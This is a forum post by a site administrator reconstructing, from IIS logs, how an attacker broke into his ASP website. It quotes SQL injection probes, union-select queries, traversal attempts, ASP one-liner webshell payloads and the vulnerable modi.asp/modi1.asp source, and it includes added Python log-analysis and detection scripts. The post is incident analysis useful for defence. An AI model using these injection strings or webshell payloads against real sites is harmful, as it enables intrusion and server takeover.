Analysis: wherever a problem can be solved with system permissions, solve it at the system level; where that really is not possible, fall back on other defensive measures.
Detailed process:
The attacker probed the four websites on my server and finally settled on www.2cto.com as the target. He then began looking for injection points. At around 17:01:13 he tested these URLs with parameters:
dc/toupiao.asp?B1=vote&B2=Result' and '7'='7
XXLR1.ASP?ID=560 and 7=2
flmen.asp?menuid=2265 and 7=7
flmen.asp?menuid=2265&menujb=2 and 7=2
flmen.asp?menuid=2265&menujb=2' and '7'='7
find.asp?LR=!S!WCRTESTINPUT000000!E!&B1=submit&MENU=all columns' and '7'='7
find.asp?B1=submit&MENU=all topics&LR=!S!WCRTESTINPUT000000!E! and '7'='7
dc/toupiao.asp?B1=vote&B2=Result' and '7'='2
/flmen.asp?menuid=2265 and 7=7
ztlm.asp?lb=Nanling scenery and '7'='2
find.asp?B1=submit&MENU=all topics&LR=!S!WCRTESTINPUT000000!E! and '7'='2
find.asp?LR=!S!WCRTESTINPUT000000!E!&B1=submit&MENU=99999999 or 7=7
This is the test method. The attacker is clever and tests the id value with non-numeric input:
http://www.bkjia.com/xxlrimg.asp?tab=&menuid=2a283
The result is an error.
Next he tests with a single quote:
http://www.bkjia.com//xxlrimg.asp?tab=&menuid=100'
This time the site's filter blocked it.
Hope of injection had been glimpsed, but after this lesson he would not test with quotes again.
Next he found the site's download section, http://www.bkjia.com//manger/Login.asp, which returned an error straight away.
The attacker tested the username with special characters such as '123456''.
He went to the home page:
http://www.bkjia.com/index.asp?LR=/xxlrimg.asp contains invalid url2283' in the menuid parameter'
He kept searching for injection points, again using non-numeric ids:
http://www.bkjia.com/XXLR1.ASP?ID=8a3
This directly threw an E14 error.
The attacker then switched targets:
/system/user/userlogin.asp
/system/user/login.asp
/system/user/login1.asp
but kept coming back to the download section for testing.
This time the username was changed to 'admin' and a union test was run, with the following syntax:
'Username = '' and exists (select username from [admin])''
The SQL is inserted directly into the username.
Then a GET test followed:
/manger/Login.asp?UserName=123'&PassWord=123&GetCode=0568&Submit.x=0&Submit.y=0
A large number of requests to /manger/Login.asp suddenly appeared.
At the same time another log entry appeared, with the content
/ever.asp?lr=%C4%FA%C3%BB%D3%D0%D7%A2%B2%E1%B3%C9%B1%BE%D5%BE%D3%C3%BB%A7,%BB%F2%C3%BB%D3%D0%B5%C7%C2%BC,%B2%BB%C4%DC%CA%B9%D3%C3%B4%CB%B9%A6%C4%DC
which decodes (GB2312) to
ever.asp?lr=You have not registered as a user of this site, or are not logged in; you cannot use this function
Still, let's keep following the behaviour of 114.237.161.118.
He kept varying the SQL guesses:
'Username = '' and exists (select username from [admin]) where ''='''
'Username = '123 and exists (select username from [admin]) where ''='''
'Username = '000000' and exists (select username from [admin]) where ''=''
'Username = '000000' and exists (select username from [admin]) where '1'='1''
'Username = '000000' and exists (select username from [admin]) where '1'='1'''
'Username = '000000' and exists (select username from [admin])''
After repeated failures he went back to the login directory:
/system/user/userlogin.asp
After two more tests the manual activity stopped, and a flood of scanner log entries began.
Judging from the log, unless I have guessed wrong, it was WWWSCAN, aimed at the system directory.
It is tiresome to wade through so many scanner entries mixed in with the attacker's manual visits, but I found a few addresses that are really bad news:
http://www.bkjia.com/system/sysupfile/up2.asp
http://www.bkjia.com/system/selectimg.asp?lb=&id=&dateid=6022999.99978859?id=541
http://www.bkjia.com/system/selectimg1.asp
http://www.bkjia.com/system/sysupfile/dispfile.asp?fitype=3&pagesn=&fiex=&upuser=
These entries are not the scanner's doing; the attacker has probably downloaded the source of the same site system for testing.
This address is depressing: it lists the images in a directory without any permission check.
What a site system.
I had thought this was just a look at the pictures, but I slowly started to worry: I saw an attempt at directory traversal. He tried it like this:
/system/sysupfile/dispfile.asp?fitype=3&pagesn=1&fiex=../&upuser=
/system/sysupfile/dispfile.asp?fitype=3&pagesn=1&fiex=.../...&upuser=
/system/sysupfile/dispfile.asp?fitype=3&pagesn=1&fiex=/...&upuser=
/system/sysupfile/dispfile.asp?fitype=3&pagesn=1&fiex=/../&upuser=
/data_file.asp?webid=&id=&dateid=6345000.00025146
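As an added example (not code from the original post), the following Python classifies the request patterns the log excerpts above show: the boolean tests such as and 7=7, the !S!WCRTESTINPUT000000!E! scanner marker, non-numeric id values, the union/exists guesses, ../ in the fiex parameter, and name.asp;jpg stems. The sample requests are constructed to mirror the excerpts; parameter names come from the page, the labels are my own.

```python
import re
from urllib.parse import parse_qsl

# Patterns matched against the decoded value of each query parameter.
PATTERNS = {
    "boolean_sqli": re.compile(r"\b(and|or)\s+'?\d+'?\s*=\s*'?\d+'?", re.I),
    "union_sqli": re.compile(r"\bunion\s+select\b", re.I),
    "exists_sqli": re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "scanner_marker": re.compile(r"wcrtestinput", re.I),
    "traversal": re.compile(r"\.\./|/\.\.|\.{3,}"),
}
# Parameters this site only ever uses with integer values.
ID_PARAMS = {"id", "menuid", "menujb"}

def classify(uri_stem, uri_query):
    """Return the sorted list of probe labels seen in one request ([] if clean)."""
    labels = set()
    # keep_blank_values so "fiex=../&upuser=" still yields the fiex pair
    for name, value in parse_qsl(uri_query, keep_blank_values=True):
        for label, rx in PATTERNS.items():
            if rx.search(value):
                labels.add(label)
        # "8a3", "2a283" and a trailing quote are the manual non-number tests
        if name.lower() in ID_PARAMS and value and not value.isdigit():
            labels.add("non_numeric_id")
    if ";" in uri_stem:  # IIS 6 runs "x.asp;jpg" as ASP
        labels.add("semicolon_extension")
    return sorted(labels)

# Constructed sample requests (stem, query) modelled on the excerpts above.
SAMPLE = [
    ("/flmen.asp", "menuid=2265&menujb=2 and 7=2"),
    ("/XXLR1.ASP", "ID=8a3"),
    ("/find.asp", "LR=!S!WCRTESTINPUT000000!E!&B1=submit&MENU=99999999 or 7=7"),
    ("/manger/Login.asp", "UserName=' and exists (select username from [admin])''"),
    ("/system/sysupfile/dispfile.asp", "fitype=3&pagesn=1&fiex=../&upuser="),
    ("/dc1/modi.asp", "id=1%20union%20select%20username,password,3,4%20from%20admin"),
    ("/shellcode.asp;jpg", "action=123"),
    ("/flmen.asp", "menuid=2265"),  # ordinary request, should stay clean
]

def scan(requests):
    """Keep only the flagged requests, as (stem, labels) pairs."""
    hits = []
    for stem, query in requests:
        labels = classify(stem, query)
        if labels:
            hits.append((stem, labels))
    return hits

if __name__ == "__main__":
    for stem, labels in scan(SAMPLE):
        print(stem, ",".join(labels))
```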
That apparently turned up nothing. As I moved on to another page I suddenly found an insertimg entry:
http://www.bkjia.com/system/insertimg.asp?dateid=6345000.00025146?id=545
That hurts.
It has no permission check either. Going on, he found the upload address:
http://www.bkjia.com/system/sysupfile/up1.asp
This one seems to have a session check, and the attacker tried to inject it:
/system/insertimg.asp?dateid=6345000.00025146?id=545'
He also found another upload point:
/system/sysupfile/up2.asp
But there seemed to be no way to use it, so he went back to hammering the login page and found several important paths:
/system/user/login1.asp
/system/user/friend.asp
A very important directory, setup, was exposed. By now it was about 17:47:02; roughly 47 minutes of trying had gone by.
/db/fileupimg2.asp
/db/webdel.asp
/system/upimg5
/system/webfilelist.asp?menuid=2292&menujb=3 (article management page)
Next the attacker found pages like these:
/dc/setup.asp
/dc/setup1.asp
No permission check.
http://www.bkjia.com/dc/modi.asp
http://www.bkjia.com/dc/modi.asp?id=1
http://www.bkjia.com/dc/modi1.asp
When I finally saw paths with Chinese text such as "/system/Management Information", I knew the scan had finished.
The attacker was still looking for injection:
/dc/modi.asp?id=1'
/dc1/modi.asp?id=1'
/dc1/modi1.asp
From the log, he then returned to the image library:
/system/selectimg.asp?lb=&id=&dateid=6022999.99978859?id=541
/system/selectimg1.asp?filetype=
/system/data.asp?id=1
/system/sysupfile/dispfile.asp?fitype=
/system/ADDfile1.asp
Next:
/dc/webdc.asp file write failure
/upfile/dark2.asp
This shows that a small webshell (a "pony") has been uploaded.
He tried the id several times:
/dc/modi.asp?id=39
/dc/webdc.asp?goaction=qbh
I had a doubt: had he already got a shell? I still wanted to check whether this was a webshell; the format looked like darkblood.
Still guessing:
/system/webedit.asp?id=1
/system/webedit.asp?id=1'
I saw it: he just wanted to try webdc. Isn't that the shell?
/system/webedit.asp?id=123
/system/webedit.asp?id=123a
/system/webedit.asp?id=123'
/system/webedit1.asp?id=123a
/system/file_laiyuan1.asp
After countless attempts he returned to where the upload started:
/system/sysupfile/up1.asp
/system/sysupfile/up2.asp
It seems he knew the absolute path of the database.
Then he confirmed it by using
http://www.bkjia.com/dc1/modi.asp?id=1
This injection point was used to read files and list directories:
/dc1/modi.asp?id=1%20union%20select%20username,password,3,4%20from%20admin%20in%20%22*://wwwroot/systemdb/%23%23%23%23userdb.asp%22%20where%20id=1
Reading on in the log, I saw another address that left me speechless:
/system/user/bbssetup.asp
The attacker ran a lot of tests on this address, then moved on to the /guestbook directory:
/guestbook/search.asp
/guestbook/login.asp
After that I was puzzled:
an access to a.asp showed up.
I opened it and found it was my own upload pony, and there was another upload pony, /shellcode.asp;jpg.
This file does not seem to have been uploaded by 114.237.129.237, because he tried its password many times:
/shellcode.asp;jpg?goaction=123
/shellcode.asp;jpg?action=123.
/shellcode.asp;jpg?action=123.
/shellcode.asp;jpg?g=1234
/shellcode.asp;jpg?s=123
/shellcode.asp;jpg?a=123
/shellcode.asp;jpg?passes=123
Later I checked the file dates and my blog notes and suddenly remembered that these shells were probably uploaded during my own testing and never deleted. I checked one of the shell passwords: it was the md5 password I use. That confused me. How did 114.237.129.237 know about this file, and how can he list the current site's directories?
systemdb/dark2.asp does exist, and that is definitely not my upload. The attacker must have obtained a backdoor.
In addition, he tried to list files in c:\windows and on drive E, and modified at least two files:
systemdb/dark2.asp and dc/webdc.asp. systemdb is the database directory, with write permission but no script permission, so this trojan should be ineffective. dc/webdc.asp is an Access database that can be written to and has script permission, but the directory itself has no write permission. Strangely, the current webdc.asp, opened in Notepad, is completely empty; it has been cleared. The attacker's foothold must be a one-line webshell that can list directories. Furthermore, unless I have guessed wrong, the address of his one-liner is dc/webdc.asp. Once he had the one-liner he wanted to write the file dc\wsi.asp. Combined with the interception log, I know it was written through dc/modi1.asp. I looked at the dc/modi1.asp source, which includes filetou.asp, and that file opens the Access database webdc.asp. Following this idea I went on through the logs, searched the access records for dc/modi1.asp, and found the trace:
"/dc/webdc.asp|69|800a000d|Type Mismatch: 'execute'". A one-liner had been written in; time to look at the surrounding records.
Now I understand why there are so many access records for dc/modi.asp, dc/modi1.asp and dc/webdc.asp. I also suddenly remembered that when k took this site last time and got the back-end password by social engineering, the shell was in this directory too. So there must be a page for database operations without administrator authentication.
View the /dc/modi1.asp source code:
<%@ LANGUAGE = VBScript.Encode %>
<!-- #include file="superno.asp" -->
<!-- #include file="filetou.asp" -->
<%
' no login check: the id comes from the session that modi.asp set for anyone
id = session("webdcid")
name = request.form("name")
sql = "Select * FROM dc where id=" & id
set rs = server.createobject("ADODB.Recordset")
rs.Open sql, conn, 1, 3
' the submitted name is written unfiltered into the database file (webdc.asp)
rs("name") = name
rs.update
rs.close
set conn = nothing
session("webdcid") = ""
response.redirect "setup.asp"
%>
When I saw rs.update I had to say it hurt, and I started to feel a little more certain about what I was thinking. How does the name get in here?
Because there are also a large number of access records for dc/modi.asp, I checked its code:
<!-- #include file="superno.asp" -->
<!-- #include file="filetou.asp" -->
<%
' no login check: anyone can supply an id
id = request("id")
dim rs
sql = "Select * FROM dc where id=" & id   ' id concatenated straight into the query
set rs = server.createobject("ADODB.Recordset")
rs.Open sql, conn, 1, 3
session("webdcid") = id                    ' handed to modi1.asp via the session
%>
<html>
<head>
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>New Page 1</title>
</head>
<body bgcolor="#E0F0F8">
<form method="POST" action="modi1.asp">
<div align="center">
<center>
<table border="1" width="70%" bordercolorlight="#000000" cellspacing="0" cellpadding="10" bordercolordark="#FFFFFF" bgcolor="#A4D1E8">
<tr>
<td width="100%">Project: <%=rs("name")%><br>
Change to: <input type="text" name="name" size="20" value="<%=rs("name")%>"> <input type="submit" value="submit" name="B1"></td>
</tr>
</table>
</center>
</div>
</form>
</body>
</html>
<% rs.close
set conn = nothing
%>
Everything is clear: his target is modi1.asp, and the form on this page writes a trojan into the database.
Now let me test it.
Because it is an Access database and the filter does not intercept it, I think it must be a Unicode-encoded one-liner. Because the database is broken, I re-uploaded one for the test. Here I have to say: testing is fine, but do not destroy other people's databases.
After uploading the database, open http://www.bkjia.com/dc/modi.asp?id=43
Insert an encoded one-liner, then open the database to check whether the operation succeeded.
The one-liner has been inserted successfully.
Try connecting with the "kitchen knife" (China Chopper) client:
The directory listing succeeds. This shows the intrusion path really is like this! With the problem found and the idea clear, on with the log analysis.
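The two conditions this test confirms, an Access database stored with a script extension (dc/webdc.asp) whose records can carry ASP delimiters, and upload names like shellcode.asp;jpg that IIS 6 treats as .asp, are exactly what a defender's sweep of the web root should flag. As an added example (not code from the post or the site system), the Python below does that sweep over a directory tree that is constructed in a temp dir to mirror the post's layout; the file contents are illustrative.

```python
import os
import tempfile

SCRIPT_EXT = {".asp", ".asa", ".cer", ".cdx", ".aspx"}
JET_MAGIC = b"\x00\x01\x00\x00Standard Jet DB"  # header bytes of a Jet/Access .mdb

def script_ext(name):
    """Extension IIS 6 would map to a script engine, also for 'x.asp;jpg' names."""
    base = name.split(";", 1)[0]
    return os.path.splitext(base)[1].lower()

def audit_webroot(root):
    """Return sorted (relative path, finding) pairs for the whole tree under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as f:
                data = f.read()
            if ";" in name and script_ext(name) in SCRIPT_EXT:
                findings.append((rel, "semicolon_script_name"))
            if data.startswith(JET_MAGIC):
                if script_ext(name) in SCRIPT_EXT:
                    findings.append((rel, "database_with_script_extension"))
                # an encoded one-liner still needs ASP delimiters to run
                if b"<%" in data or b"runat=" in data.lower():
                    findings.append((rel, "asp_tag_inside_database"))
    return sorted(findings)

def build_sample_root():
    """Constructed tree mirroring the post's layout (dc/, upfile/); returns its path."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "dc"))
    os.makedirs(os.path.join(root, "upfile"))
    # Access file renamed webdc.asp, with a one-liner planted in a record
    with open(os.path.join(root, "dc", "webdc.asp"), "wb") as f:
        f.write(JET_MAGIC + b"\x00" * 64 + b"name=<%eval request()%>")
    with open(os.path.join(root, "upfile", "shellcode.asp;jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff")  # JPEG header; the body is irrelevant here
    with open(os.path.join(root, "dc", "setup.asp"), "wb") as f:
        f.write(b"<% Response.Write \"ok\" %>")  # ordinary script, not flagged
    return root

if __name__ == "__main__":
    for rel, finding in audit_webroot(build_sample_root()):
        print(finding, rel)
```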
The attacker inserted into the database twice in total.
2010-06-06 18:16:55 222.73.167.44 GET /dc/webdc.asp. This entry is the first check of whether the insertion succeeded. Since the database was not damaged the first time, /dc/modi.asp?id=1 could still be accessed directly. He then wanted to write the trojan out to a file, but without write permission this failed repeatedly, leaving entries like "/dc/webdc.asp|0|800a0bbc|An error occurred while writing the file." He then started listing directories, looking for somewhere files could be uploaded, wrote dark2.asp into the database directory /systemdb/, and tried /systemdb/dark2.asp?goaction=qbh. Since that directory has no script permission he could not log in that way, so he cleared the content and replaced it with "test"; that is where this file came from. He then uploaded /upfile/dark2.asp, but with no script permission there either, it was deleted.
After the first successful insertion he tried to create dc\wsi.asp, without success. He then tried to list c:\windows and c:\windows\system32, also without success, and at the same time tried to list drive E. Drive E is the CD-ROM drive and I have nothing set up on it.
For some reason the next database insertion went wrong and the database broke; /dc/modi.asp?id=1 was no longer accessible. So he tried many times to find a correct id value.
I wondered how he could keep testing the id to find a correct value and insert a one-liner. I have to say the attacker is really familiar with this code, more than I am. The log shows that id 43 was correct. After the successful insertion he connected with the kitchen knife client, then wanted to replace this webdc.asp with a full webshell (a "big horse"). Because no writable directory could be found, and the directory he could write to has no script permission, he had to find a way to replace the database webdc.asp itself with the big webshell. He tried to log in like this many times:
/dc/webdc.asp?goaction=qbh
/dc/webdc.asp?goaction=login
Then he went looking for other vulnerabilities, continuing to test a large number of injection points and back-end files. After that he came back to /dc1/modi.asp, and what depressed me was that he guessed the table.
He kept struggling like this, hunting for sensitive files and trying to upload a big webshell.
Around 20:10:42 on February 6 he finally confirmed that dc/webdc.asp was working. Unless I have guessed wrong, the attacker then went to dinner.
When I shared this, I checked another interception log and found the time did not match. Looking carefully, I realised I had not set the IIS log time to system time: it uses Greenwich Mean Time, which is eight hours behind Beijing time. So the attack started at June 7 17:01:13 plus eight hours, that is, about 01:01 the following morning. So it was not dinner; he should have gone to bed, which also fits a night owl's habits.
With that we can read the other logs together clearly. When inserting into the database the attacker tested the following statements:
<%eval request()%>
<script language=vbscript runat=server>execute request()</script>
<%execute request()%>
All of these were intercepted, so what was the one that succeeded? It must have been an ASCII-encoded one-liner.
At around 02:51:55 on February 7 the attacker started testing again. He tried the union query several times, which also forced him to change his IP address:
http://www.bkjia.com/dc1/modi.asp?id=1%20union%20select%20username,password,3,4%20from%20admin%20in%20"D:\website\target\wwwroot\systemdb\%23%23%23userdb.asp"%20where%20id=1
http://www.bkjia.com/dc1/modi.asp?id=1%20union%20select%23%,23%,23%from%20admin%20in%20"D:\website\target\wwwroot\systemdb\%23userdb.asp"%20where%20id=1
Depressing: he got the database's physical path through the one-liner and then tried to inject, which hurts. Because the injection gets his IP blocked, the attacker has to restart his router to obtain a new IP address:
114.237.161.118
114.237.130.191
114.237.130.14
114.237.128.98
114.237.130.110
After this injection the IP changed to 114.237.129.237, and after one more test the testing was done.
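As an added example (not code from the original post), this Python reconstructs the attacker's timeline from IIS W3C log lines: it applies the eight-hour correction described above (IIS logs in UTC, Beijing is UTC+8) and groups requests by the client's /16 prefix, so the redialled 114.237.x.x addresses fall into one session. The log lines are constructed for the example and are not the real server's log.

```python
from datetime import datetime, timedelta, timezone
from ipaddress import ip_network

BEIJING = timezone(timedelta(hours=8))  # IIS writes W3C log times in UTC

# Constructed sample in IIS 6 W3C format; not the real server's log.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-06-07 17:01:13 114.237.161.118 GET /flmen.asp menuid=2265+and+7=7 200
2010-06-07 17:47:02 114.237.161.118 GET /db/webdel.asp - 200
2010-06-07 18:16:55 222.73.167.44 GET /dc/webdc.asp - 200
2010-06-07 18:51:55 114.237.130.191 GET /dc1/modi.asp id=1%20union%20select%201,2,3,4 500
2010-06-07 20:10:42 114.237.129.237 GET /dc/webdc.asp goaction=qbh 200
"""

def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def local_time(rec):
    """Convert the record's UTC date/time to Beijing time (UTC+8)."""
    utc = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
    return utc.replace(tzinfo=timezone.utc).astimezone(BEIJING)

def sessions(text, mask=16):
    """Group records by the client's /mask network. An attacker who redials for
    a fresh address usually stays inside one prefix, so the 114.237.x.x hops
    collapse into a single session. Returns
    {network: (first seen, last seen, sorted distinct IPs, request count)}."""
    groups = {}
    for rec in parse_w3c(text):
        net = str(ip_network(rec["c-ip"] + "/%d" % mask, strict=False))
        t = local_time(rec)
        first, last, ips, n = groups.get(net, (t, t, set(), 0))
        groups[net] = (min(first, t), max(last, t), ips | {rec["c-ip"]}, n + 1)
    return {k: (f, l, sorted(ips), n) for k, (f, l, ips, n) in groups.items()}

if __name__ == "__main__":
    for net, (first, last, ips, n) in sessions(SAMPLE_LOG).items():
        print(net, first.strftime("%m-%d %H:%M:%S"), "to",
              last.strftime("%m-%d %H:%M:%S"), n, "requests from", ips)
```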
This section summarises the attacker's whole approach. The attack began on June 7 and the whole process lasted about four hours. The first step was reconnaissance: test the four websites on the server, settle on www.2cto.com, and decide to start from that site. Once the site was chosen, test the likely injection points on its pages, trying many pages with parameters. Failing that, run the WWWSCAN scanner against the site system. At the same time, download the same site system for study, test the various pages that might have problems, find the page where a one-liner can be inserted, insert it, and then try to expand and spread the results, which did not succeed. The IIS log analysis ends here. Then an idea came to me: could this tester be a fellow member of Dao Cheng? Let me search.
There are two members whose IP starts with 114.237.
The chance of sharing an IP segment is slim. My first thought was that it was bbt4ng, or at least a friend of his not far away!
Later I chatted with him.
This article was posted on the Tusi Forum!